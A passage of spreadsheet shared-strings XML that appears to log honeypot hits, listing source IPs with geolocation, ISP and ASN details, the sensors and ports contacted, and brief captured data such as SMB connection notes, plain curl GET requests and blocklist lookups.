    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H24&amp;&amp;SMA-LAB_DNS_H10&amp;&amp;SMA-LAB_MT-CPA_H18&amp;&amp;SMA-LAB_SMB_H29&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H29&amp;&amp;SMA-LAB_MSSQL_H13</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;53&amp;&amp;2817&amp;&amp;1433&amp;&amp;3306</t>
  </si>
  <si>
    <t>1262039</t>
  </si>
  <si>
    <t>637001</t>
  </si>
  <si>
    <t>11.2828</t>
  </si>
  <si>
    <t>78.2313</t>
  </si>
  <si>
    <t>2015-05-19</t>
  </si>
  <si>
    <t>ICENET</t>
  </si>
  <si>
    <t>::ffff:6739:9687</t>
  </si>
  <si>
    <t>7d6e4785dafabee7d891fcdce63fc2e5</t>
  </si>
  <si>
    <t>49.130.153.83</t>
  </si>
  <si>
    <t>::ffff:3182:9953</t>
  </si>
  <si>
    <t>3cb4aaf906749b2bce7f7a42359cd389</t>
  </si>
  <si>
    <t>117.199.22.59</t>
  </si>
  <si>
    <t>::ffff:75c7:163b</t>
  </si>
  <si>
    <t>64be1ccc5cd8de427dac53aeb5641669</t>
  </si>
  <si>
    <t>1.10.211.47</t>
  </si>
  <si>
    <t>::ffff:10a:d32f</t>
  </si>
  <si>
    <t>a443564600288b5d2b49bff8981210e5</t>
  </si>
  <si>
    <t>116.107.126.65</t>
  </si>
  <si>
    <t>::ffff:746b:7e41</t>
  </si>
  <si>
    <t>f8bd72688e207ab690698588020de4f9</t>
  </si>
  <si>
    <t>120.56.229.54</t>
  </si>
  <si>
    <t>::ffff:7838:e536</t>
  </si>
  <si>
    <t>f4ce9af5047dfdf82f5ad7dc068e3cc5</t>
  </si>
  <si>
    <t>103.6.6.91</t>
  </si>
  <si>
    <t>SMA-LAB_SMB_H45&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>HSO</t>
  </si>
  <si>
    <t>Southern</t>
  </si>
  <si>
    <t>Aberdeen</t>
  </si>
  <si>
    <t>1819757</t>
  </si>
  <si>
    <t>22.2491</t>
  </si>
  <si>
    <t>114.165</t>
  </si>
  <si>
    <t>55361</t>
  </si>
  <si>
    <t>Lucky Tone Communications Ltd</t>
  </si>
  <si>
    <t>Connect Communications (Pvt.) Limited</t>
  </si>
  <si>
    <t>2012-02-14</t>
  </si>
  <si>
    <t>LUCKYTONE-NET-HK</t>
  </si>
  <si>
    <t>{Data_SMB:Incoming connection (103.6.6.91,59263)}&amp;&amp;{Data_MSSQl:NA}</t>
  </si>
  <si>
    <t>::ffff:6706:65b</t>
  </si>
  <si>
    <t>ea43975027b348b5723f62861200a1bd</t>
  </si>
  <si>
    <t>114.33.7.225</t>
  </si>
  <si>
    <t>114-33-7-225.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_HTTP_H3&amp;&amp;SMA-LAB_MT-CPA_H36&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_MT-CPA_H7&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_TELNET_H31</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;26988&amp;&amp;19467&amp;&amp;23&amp;&amp;58419&amp;&amp;28483&amp;&amp;9100&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7221:7e1</t>
  </si>
  <si>
    <t>b5b3551d6b4376e9abf365244e0e6854</t>
  </si>
  <si>
    <t>157.15.166.67</t>
  </si>
  <si>
    <t>-5.15688</t>
  </si>
  <si>
    <t>105.304</t>
  </si>
  <si>
    <t>152382</t>
  </si>
  <si>
    <t>PT Kartika Siger Network</t>
  </si>
  <si>
    <t>IDNIC-KSN-ID</t>
  </si>
  <si>
    <t>{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (157.15.166.67,50262)}&amp;&amp;{Data_SMB:Incoming connection (157.15.166.67,50547)}</t>
  </si>
  <si>
    <t>::ffff:9d0f:a643</t>
  </si>
  <si>
    <t>5ea6c23e62f2ec9a47b75358e4cf0a5b</t>
  </si>
  <si>
    <t>117.221.9.109</t>
  </si>
  <si>
    <t>::ffff:75dd:96d</t>
  </si>
  <si>
    <t>3825a4adc830dbaf2522472f59880c83</t>
  </si>
  <si>
    <t>36.76.99.189</t>
  </si>
  <si>
    <t>TLKM_BB_SERVICE_36_76_DIVRE1</t>
  </si>
  <si>
    <t>::ffff:244c:63bd</t>
  </si>
  <si>
    <t>41dc61f409794c6f248aea9fc372d95c</t>
  </si>
  <si>
    <t>117.205.159.1</t>
  </si>
  <si>
    <t>::ffff:75cd:9f01</t>
  </si>
  <si>
    <t>06ed0d17dc2e2c4d6febd7bc75635242</t>
  </si>
  <si>
    <t>116.104.210.87</t>
  </si>
  <si>
    <t>::ffff:7468:d257</t>
  </si>
  <si>
    <t>a3e08e1a8c317cbf72e27b4745038066</t>
  </si>
  <si>
    <t>202.6.226.18</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H6</t>
  </si>
  <si>
    <t>Kota Cirebon</t>
  </si>
  <si>
    <t>Cirebon</t>
  </si>
  <si>
    <t>1646170</t>
  </si>
  <si>
    <t>-6.73202</t>
  </si>
  <si>
    <t>108.552</t>
  </si>
  <si>
    <t>23756</t>
  </si>
  <si>
    <t>PADINET - Padi Internet</t>
  </si>
  <si>
    <t>Padinet</t>
  </si>
  <si>
    <t>2003-04-23</t>
  </si>
  <si>
    <t>PADINET-ID</t>
  </si>
  <si>
    <t>{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (202.6.226.18,56603)}&amp;&amp;{Data_SMB:Incoming connection (202.6.226.18,56865)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:ca06:e212</t>
  </si>
  <si>
    <t>f26685b5e0a5d51ab3bb5c26ea6b89e5</t>
  </si>
  <si>
    <t>190.167.31.98</t>
  </si>
  <si>
    <t>Santo Domingo</t>
  </si>
  <si>
    <t>18.4823</t>
  </si>
  <si>
    <t>-69.9344</t>
  </si>
  <si>
    <t>::ffff:bea7:1f62</t>
  </si>
  <si>
    <t>f92ab14b673502ed7ffdef2028c4a006</t>
  </si>
  <si>
    <t>222.107.92.153</t>
  </si>
  <si>
    <t>::ffff:de6b:5c99</t>
  </si>
  <si>
    <t>39b6d9b961aa0fb9d1b8fa21b8af930d</t>
  </si>
  <si>
    <t>176.8.194.114</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_SMTP_H39</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;25&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:b008:c272</t>
  </si>
  <si>
    <t>aca146af77beb4246aa710df14c7bfcb</t>
  </si>
  <si>
    <t>81.213.156.4</t>
  </si>
  <si>
    <t>::ffff:51d5:9c04</t>
  </si>
  <si>
    <t>180d107f9ac0ec8a98a35d1a5b0f6e39</t>
  </si>
  <si>
    <t>179.106.17.181</t>
  </si>
  <si>
    <t>Patrocínio</t>
  </si>
  <si>
    <t>3454763</t>
  </si>
  <si>
    <t>-18.9439</t>
  </si>
  <si>
    <t>-46.9925</t>
  </si>
  <si>
    <t>262595</t>
  </si>
  <si>
    <t>OnNet Telecomunicações LTDA</t>
  </si>
  <si>
    <t>OnNet Telecomunicacoes LTDA</t>
  </si>
  <si>
    <t>::ffff:b36a:11b5</t>
  </si>
  <si>
    <t>d775cab70dae42bd60a3998929683442</t>
  </si>
  <si>
    <t>117.207.246.108</t>
  </si>
  <si>
    <t>::ffff:75cf:f66c</t>
  </si>
  <si>
    <t>92e9edba6abf81ecc3ec41ab4b6d0b03</t>
  </si>
  <si>
    <t>59.178.159.150</t>
  </si>
  <si>
    <t>::ffff:3bb2:9f96</t>
  </si>
  <si>
    <t>31078f2e98c408c15d37bd56616f0af6</t>
  </si>
  <si>
    <t>122.172.83.5</t>
  </si>
  <si>
    <t>1275738</t>
  </si>
  <si>
    <t>17.908</t>
  </si>
  <si>
    <t>77.5152</t>
  </si>
  <si>
    <t>::ffff:7aac:5305</t>
  </si>
  <si>
    <t>2c667cf10966cd30080b20040ef8c50d</t>
  </si>
  <si>
    <t>59.182.252.191</t>
  </si>
  <si>
    <t>::ffff:3bb6:fcbf</t>
  </si>
  <si>
    <t>8cad67a414bdf0932bc40b1ad76c55e6</t>
  </si>
  <si>
    <t>103.92.103.177</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_DHCP_H26&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H22</t>
  </si>
  <si>
    <t>23&amp;&amp;67&amp;&amp;NA</t>
  </si>
  <si>
    <t>{'all.s5h.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}</t>
  </si>
  <si>
    <t>2017-05-08</t>
  </si>
  <si>
    <t>SUNILBL</t>
  </si>
  <si>
    <t>::ffff:675c:67b1</t>
  </si>
  <si>
    <t>c8014ca800208eabdd4bd3e252d506e2</t>
  </si>
  <si>
    <t>48.216.248.104</t>
  </si>
  <si>
    <t>SMA-LAB_ORACLE_H30&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>1521&amp;&amp;1433&amp;&amp;NA</t>
  </si>
  <si>
    <t>{Data_ORACLE:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:30d8:f868</t>
  </si>
  <si>
    <t>9d67cd2bab32c574fabf42e2ca003ac3</t>
  </si>
  <si>
    <t>117.203.133.39</t>
  </si>
  <si>
    <t>::ffff:75cb:8527</t>
  </si>
  <si>
    <t>1fa092026849a640e021a9acee8ff932</t>
  </si>
  <si>
    <t>117.206.4.211</t>
  </si>
  <si>
    <t>::ffff:75ce:4d3</t>
  </si>
  <si>
    <t>8b2bb63193ad6528eeaafa30249f4505</t>
  </si>
  <si>
    <t>117.193.37.45</t>
  </si>
  <si>
    <t>::ffff:75c1:252d</t>
  </si>
  <si>
    <t>1e55093de02a80062cb6036864e8f23f</t>
  </si>
  <si>
    <t>117.241.178.52</t>
  </si>
  <si>
    <t>::ffff:75f1:b234</t>
  </si>
  <si>
    <t>0fe3b8ccab56d95be2f60ff20b61109c</t>
  </si>
  <si>
    <t>84.22.35.246</t>
  </si>
  <si>
    <t>Albania</t>
  </si>
  <si>
    <t>Tirana</t>
  </si>
  <si>
    <t>Bashkia Tiranë</t>
  </si>
  <si>
    <t>3183875</t>
  </si>
  <si>
    <t>41.3275</t>
  </si>
  <si>
    <t>19.8187</t>
  </si>
  <si>
    <t>33983</t>
  </si>
  <si>
    <t>ARTMOTION SH.P.K.</t>
  </si>
  <si>
    <t>Artmotion Sh.P.K.</t>
  </si>
  <si>
    <t>Artmotion</t>
  </si>
  <si>
    <t>::ffff:5416:23f6</t>
  </si>
  <si>
    <t>813fd6b942b59727d851f0c0bebb7b93</t>
  </si>
  <si>
    <t>116.73.52.71</t>
  </si>
  <si>
    <t>::ffff:7449:3447</t>
  </si>
  <si>
    <t>c2b152a5da4d03a4838d16b802026df3</t>
  </si>
  <si>
    <t>200.60.12.4</t>
  </si>
  <si>
    <t>SMA-LAB_LDAP_H12&amp;&amp;SMA-LAB_LDAP_HC1</t>
  </si>
  <si>
    <t>-12.0464</t>
  </si>
  <si>
    <t>-77.0428</t>
  </si>
  <si>
    <t>6147</t>
  </si>
  <si>
    <t>Telefonica del Peru S.A.A.</t>
  </si>
  <si>
    <t>EL COMERCIO</t>
  </si>
  <si>
    <t>::ffff:c83c:c04</t>
  </si>
  <si>
    <t>55dbe39017cfbba545785af6276fa865</t>
  </si>
  <si>
    <t>120.61.221.236</t>
  </si>
  <si>
    <t>::ffff:783d:ddec</t>
  </si>
  <si>
    <t>61b1b09feebb01eff94fd270965a38b8</t>
  </si>
  <si>
    <t>61.2.149.129</t>
  </si>
  <si>
    <t>::ffff:3d02:9581</t>
  </si>
  <si>
    <t>fce0c10ccd9810b7b4ac3858b3ff04ed</t>
  </si>
  <si>
    <t>117.223.92.134</t>
  </si>
  <si>
    <t>::ffff:75df:5c86</t>
  </si>
  <si>
    <t>9d03d2ae572825e22638261b0fdf5769</t>
  </si>
  <si>
    <t>61.1.139.151</t>
  </si>
  <si>
    <t>::ffff:3d01:8b97</t>
  </si>
  <si>
    <t>248fd1ce5a426e2dcc19d2a8c413915e</t>
  </si>
  <si>
    <t>48.216.248.217</t>
  </si>
  <si>
    <t>SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_SOCKS5_H12</t>
  </si>
  <si>
    <t>5900&amp;&amp;1080&amp;&amp;NA&amp;&amp;21</t>
  </si>
  <si>
    <t>{Data_VNC:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;NA&amp;&amp;{Data_FTP:NA}</t>
  </si>
  <si>
    <t>::ffff:30d8:f8d9</t>
  </si>
  <si>
    <t>17f04b6b8a7b7dc9600422128c55d612</t>
  </si>
  <si>
    <t>117.207.172.91</t>
  </si>
  <si>
    <t>::ffff:75cf:ac5b</t>
  </si>
  <si>
    <t>2ea39669a961a5cd7a1721f0072a75d1</t>
  </si>
  <si>
    <t>202.53.138.127</t>
  </si>
  <si>
    <t>138195</t>
  </si>
  <si>
    <t>MOACK.Co.LTD</t>
  </si>
  <si>
    <t>HENGDA</t>
  </si>
  <si>
    <t>Hengda Network Limited</t>
  </si>
  <si>
    <t>2017-09-20</t>
  </si>
  <si>
    <t>HENGDA-HK</t>
  </si>
  <si>
    <t>::ffff:ca35:8a7f</t>
  </si>
  <si>
    <t>8013933ef70c31ca6de884826298050d</t>
  </si>
  <si>
    <t>74.116.58.20</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>33106&amp;&amp;23</t>
  </si>
  <si>
    <t>{'zen.spamhaus.org': ['unknown'&amp;&amp; 'exploits']}</t>
  </si>
  <si>
    <t>2009-08-03</t>
  </si>
  <si>
    <t>ISLAND-NET</t>
  </si>
  <si>
    <t>2012-06-05</t>
  </si>
  <si>
    <t>::ffff:4a74:3a14</t>
  </si>
  <si>
    <t>aa30a3361af107679308d1fe4b0133f7</t>
  </si>
  <si>
    <t>179.240.252.69</t>
  </si>
  <si>
    <t>179-240-252-69.3g.claro.net.br</t>
  </si>
  <si>
    <t>Garça</t>
  </si>
  <si>
    <t>3462580</t>
  </si>
  <si>
    <t>-22.2106</t>
  </si>
  <si>
    <t>-49.6561</t>
  </si>
  <si>
    <t>AS22085</t>
  </si>
  <si>
    <t>2000-01-13 00:00:00</t>
  </si>
  <si>
    <t>2027-01-13 00:00:00</t>
  </si>
  <si>
    <t>2025-01-14 00:00:00</t>
  </si>
  <si>
    <t>::ffff:b3f0:fc45</t>
  </si>
  <si>
    <t>76a39103f6d1013ffe48ee6434d405db</t>
  </si>
  <si>
    <t>117.200.180.216</t>
  </si>
  <si>
    <t>::ffff:75c8:b4d8</t>
  </si>
  <si>
    <t>15f2542abf0f068ac8fc4da0b9fec61c</t>
  </si>
  <si>
    <t>59.88.62.27</t>
  </si>
  <si>
    <t>::ffff:3b58:3e1b</t>
  </si>
  <si>
    <t>0f5f7ed9ab4c5d0505afb8bbb76bb1b1</t>
  </si>
  <si>
    <t>211.199.198.93</t>
  </si>
  <si>
    <t>Gimje-si</t>
  </si>
  <si>
    <t>Gimje-si (Yochon-dong)</t>
  </si>
  <si>
    <t>1842211</t>
  </si>
  <si>
    <t>35.8186</t>
  </si>
  <si>
    <t>126.891</t>
  </si>
  <si>
    <t>::ffff:d3c7:c65d</t>
  </si>
  <si>
    <t>55eabb4faaebd279fe2ca8da5f4e25b0</t>
  </si>
  <si>
    <t>117.202.65.11</t>
  </si>
  <si>
    <t>::ffff:75ca:410b</t>
  </si>
  <si>
    <t>f0a4748610f3c715cb3dfc3e78df5d8b</t>
  </si>
  <si>
    <t>117.99.60.209</t>
  </si>
  <si>
    <t>Paschim Bardhaman</t>
  </si>
  <si>
    <t>Durgapur (Bidhannagar)</t>
  </si>
  <si>
    <t>1272175</t>
  </si>
  <si>
    <t>713215</t>
  </si>
  <si>
    <t>23.5279</t>
  </si>
  <si>
    <t>87.3425</t>
  </si>
  <si>
    <t>2007-07-06</t>
  </si>
  <si>
    <t>::ffff:7563:3cd1</t>
  </si>
  <si>
    <t>2c7a34903ce2b4fe604a8d9eeacf1a76</t>
  </si>
  <si>
    <t>220.82.209.105</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>59406&amp;&amp;23&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:dc52:d169</t>
  </si>
  <si>
    <t>39da49689f1a6018c64e4b9f11db6574</t>
  </si>
  <si>
    <t>117.193.51.145</t>
  </si>
  <si>
    <t>::ffff:75c1:3391</t>
  </si>
  <si>
    <t>c6bf9da130dca42671943b3b2873c516</t>
  </si>
  <si>
    <t>120.57.212.212</t>
  </si>
  <si>
    <t>::ffff:7839:d4d4</t>
  </si>
  <si>
    <t>606bfab854c13a1bbfd38136442c7b79</t>
  </si>
  <si>
    <t>59.183.154.174</t>
  </si>
  <si>
    <t>::ffff:3bb7:9aae</t>
  </si>
  <si>
    <t>00fa981a1be05fcfcb5fcc658ca7f6b5</t>
  </si>
  <si>
    <t>116.74.29.232</t>
  </si>
  <si>
    <t>::ffff:744a:1de8</t>
  </si>
  <si>
    <t>f26321fcee4a484b11f3f521ff6d6c44</t>
  </si>
  <si>
    <t>117.219.65.144</t>
  </si>
  <si>
    <t>::ffff:75db:4190</t>
  </si>
  <si>
    <t>3688f288401c8ef895e48407925855af</t>
  </si>
  <si>
    <t>59.184.255.252</t>
  </si>
  <si>
    <t>::ffff:3bb8:fffc</t>
  </si>
  <si>
    <t>ceb4689e1fd879d432593e210cc66abe</t>
  </si>
  <si>
    <t>209.103.235.225</t>
  </si>
  <si>
    <t>Sheboygan</t>
  </si>
  <si>
    <t>Adell</t>
  </si>
  <si>
    <t>5243587</t>
  </si>
  <si>
    <t>53001</t>
  </si>
  <si>
    <t>43.5483</t>
  </si>
  <si>
    <t>-87.9424</t>
  </si>
  <si>
    <t>36001</t>
  </si>
  <si>
    <t>Bertram Communications LLC</t>
  </si>
  <si>
    <t>::ffff:d167:ebe1</t>
  </si>
  <si>
    <t>1702b3ac9cc837eea4242d0618cb5913</t>
  </si>
  <si>
    <t>103.142.11.107</t>
  </si>
  <si>
    <t>136285</t>
  </si>
  <si>
    <t>KIPVT-AS-IN</t>
  </si>
  <si>
    <t>Karunay Internet Pvt Ltd</t>
  </si>
  <si>
    <t>::ffff:678e:b6b</t>
  </si>
  <si>
    <t>2e368a7ee165459dfe1f453d32e63a6d</t>
  </si>
  <si>
    <t>211.229.92.71</t>
  </si>
  <si>
    <t>::ffff:d3e5:5c47</t>
  </si>
  <si>
    <t>4ddcc737b654eef98a6ca125b02be2dc</t>
  </si>
  <si>
    <t>121.154.44.114</t>
  </si>
  <si>
    <t>::ffff:799a:2c72</t>
  </si>
  <si>
    <t>501f0265596d372c521409a73bd9c9e2</t>
  </si>
  <si>
    <t>13.217.143.81</t>
  </si>
  <si>
    <t>NA&amp;&amp;ec2-13-217-143-81.compute-1.amazonaws.com</t>
  </si>
  <si>
    <t>::ffff:dd9:8f51</t>
  </si>
  <si>
    <t>00d9d8357f820771976d2d8808c12a1f</t>
  </si>
  <si>
    <t>59.93.172.153</t>
  </si>
  <si>
    <t>::ffff:3b5d:ac99</t>
  </si>
  <si>
    <t>5a08b493a6f5a02c407be3d39719b9f7</t>
  </si>
  <si>
    <t>114.35.124.142</t>
  </si>
  <si>
    <t>NA&amp;&amp;114-35-124-142.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H34</t>
  </si>
  <si>
    <t>::ffff:7223:7c8e</t>
  </si>
  <si>
    <t>d370daa610b9de74423b2dbe62626542</t>
  </si>
  <si>
    <t>182.53.183.137</t>
  </si>
  <si>
    <t>Sukhothai</t>
  </si>
  <si>
    <t>Mueang Sukhothai</t>
  </si>
  <si>
    <t>Ban Na</t>
  </si>
  <si>
    <t>1156257</t>
  </si>
  <si>
    <t>17.0172</t>
  </si>
  <si>
    <t>99.7328</t>
  </si>
  <si>
    <t>::ffff:b635:b789</t>
  </si>
  <si>
    <t>f165705d7a0aabe6d306a4ecda2f9291</t>
  </si>
  <si>
    <t>120.60.84.195</t>
  </si>
  <si>
    <t>::ffff:783c:54c3</t>
  </si>
  <si>
    <t>8401feeebdcffa38461f49ac7e206266</t>
  </si>
  <si>
    <t>171.243.58.207</t>
  </si>
  <si>
    <t>Đồng Tháp Province</t>
  </si>
  <si>
    <t>Sa Dec city</t>
  </si>
  <si>
    <t>Sa Dec</t>
  </si>
  <si>
    <t>1568212</t>
  </si>
  <si>
    <t>10.2908</t>
  </si>
  <si>
    <t>105.756</t>
  </si>
  <si>
    <t>::ffff:abf3:3acf</t>
  </si>
  <si>
    <t>4bf29a776dec79bcbc8a8795b58ed3a8</t>
  </si>
  <si>
    <t>117.209.24.138</t>
  </si>
  <si>
    <t>::ffff:75d1:188a</t>
  </si>
  <si>
    <t>2514bd169f9e0ffb590d679b75f9340e</t>
  </si>
  <si>
    <t>185.254.75.33</t>
  </si>
  <si>
    <t>2018-04-10</t>
  </si>
  <si>
    <t>::ffff:b9fe:4b21</t>
  </si>
  <si>
    <t>9f69b52f0cc76d2eeb1ac2241b72ff06</t>
  </si>
  <si>
    <t>120.56.177.212</t>
  </si>
  <si>
    <t>::ffff:7838:b1d4</t>
  </si>
  <si>
    <t>26fc56606f9bc9134f688ec17a320d03</t>
  </si>
  <si>
    <t>110.139.254.23</t>
  </si>
  <si>
    <t>Central Papua</t>
  </si>
  <si>
    <t>Mimika Regency</t>
  </si>
  <si>
    <t>Timika</t>
  </si>
  <si>
    <t>1623834</t>
  </si>
  <si>
    <t>-4.54676</t>
  </si>
  <si>
    <t>136.884</t>
  </si>
  <si>
    <t>2009-04-20</t>
  </si>
  <si>
    <t>TLKM_BB_INF_110_139</t>
  </si>
  <si>
    <t>::ffff:6e8b:fe17</t>
  </si>
  <si>
    <t>dba74d47fc71c3b3cb1aaed0f4439c8b</t>
  </si>
  <si>
    <t>117.221.127.122</t>
  </si>
  <si>
    <t>::ffff:75dd:7f7a</t>
  </si>
  <si>
    <t>6d530ba36229b4e45c3c5c32c5cc46a5</t>
  </si>
  <si>
    <t>59.178.11.28</t>
  </si>
  <si>
    <t>::ffff:3bb2:b1c</t>
  </si>
  <si>
    <t>2a5d947967e941c9a543fd23448ce40a</t>
  </si>
  <si>
    <t>59.98.22.187</t>
  </si>
  <si>
    <t>::ffff:3b62:16bb</t>
  </si>
  <si>
    <t>f09542244b9bb5d3cf8e826c62b9e079</t>
  </si>
  <si>
    <t>122.171.21.28</t>
  </si>
  <si>
    <t>{'all.s5h.net': ['unknown']&amp;&amp; 'z.mailspike.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}</t>
  </si>
  <si>
    <t>::ffff:7aab:151c</t>
  </si>
  <si>
    <t>b21bcd7e9b9c313dd97420e91c48bd52</t>
  </si>
  <si>
    <t>176.91.18.94</t>
  </si>
  <si>
    <t>::ffff:b05b:125e</t>
  </si>
  <si>
    <t>77b172d9e03e3519e8e9f0a96e0c7989</t>
  </si>
  <si>
    <t>117.254.20.24</t>
  </si>
  <si>
    <t>::ffff:75fe:1418</t>
  </si>
  <si>
    <t>b1e4be44e994bacbbf7b03681e99b093</t>
  </si>
  <si>
    <t>117.216.21.74</t>
  </si>
  <si>
    <t>::ffff:75d8:154a</t>
  </si>
  <si>
    <t>a4da9528573eaed2eae931c075901d7c</t>
  </si>
  <si>
    <t>117.192.237.162</t>
  </si>
  <si>
    <t>::ffff:75c0:eda2</t>
  </si>
  <si>
    <t>a2cb0baf751f1fb377397872af902646</t>
  </si>
  <si>
    <t>220.133.63.69</t>
  </si>
  <si>
    <t>NA&amp;&amp;220-133-63-69.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>::ffff:dc85:3f45</t>
  </si>
  <si>
    <t>ed36617a9777ee5703525b049cd79833</t>
  </si>
  <si>
    <t>117.241.204.187</t>
  </si>
  <si>
    <t>::ffff:75f1:ccbb</t>
  </si>
  <si>
    <t>c39ad05c74a8227ac2f378173c597ca1</t>
  </si>
  <si>
    <t>59.182.78.59</t>
  </si>
  <si>
    <t>::ffff:3bb6:4e3b</t>
  </si>
  <si>
    <t>9ff5a8ac576f2f61aa07fc620dfee1ac</t>
  </si>
  <si>
    <t>115.97.32.45</t>
  </si>
  <si>
    <t>::ffff:7361:202d</t>
  </si>
  <si>
    <t>867ccc418179d613da59d85839072b1f</t>
  </si>
  <si>
    <t>115.99.49.74</t>
  </si>
  <si>
    <t>::ffff:7363:314a</t>
  </si>
  <si>
    <t>8aeaf52c694610554c773145f1a3fe2a</t>
  </si>
  <si>
    <t>153.207.229.169</t>
  </si>
  <si>
    <t>p2645169-ipxg00g01fukuokachu.fukuoka.ocn.ne.jp</t>
  </si>
  <si>
    <t>33.5902</t>
  </si>
  <si>
    <t>130.402</t>
  </si>
  <si>
    <t>::ffff:99cf:e5a9</t>
  </si>
  <si>
    <t>bcecd2c55738d981bf265b2171cd60b0</t>
  </si>
  <si>
    <t>117.221.122.196</t>
  </si>
  <si>
    <t>::ffff:75dd:7ac4</t>
  </si>
  <si>
    <t>ca129d8e7579b363a9aaca9e75a7340b</t>
  </si>
  <si>
    <t>101.51.33.65</t>
  </si>
  <si>
    <t>node-6kh.pool-101-51.dynamic.totinternet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:6533:2141</t>
  </si>
  <si>
    <t>7b94b57839c3d1023d45dc1bbf65bfd9</t>
  </si>
  <si>
    <t>46.118.78.126</t>
  </si>
  <si>
    <t>23&amp;&amp;NA&amp;&amp;65279</t>
  </si>
  <si>
    <t>Zaporizhzhia</t>
  </si>
  <si>
    <t>Zaporizhzhia Raion</t>
  </si>
  <si>
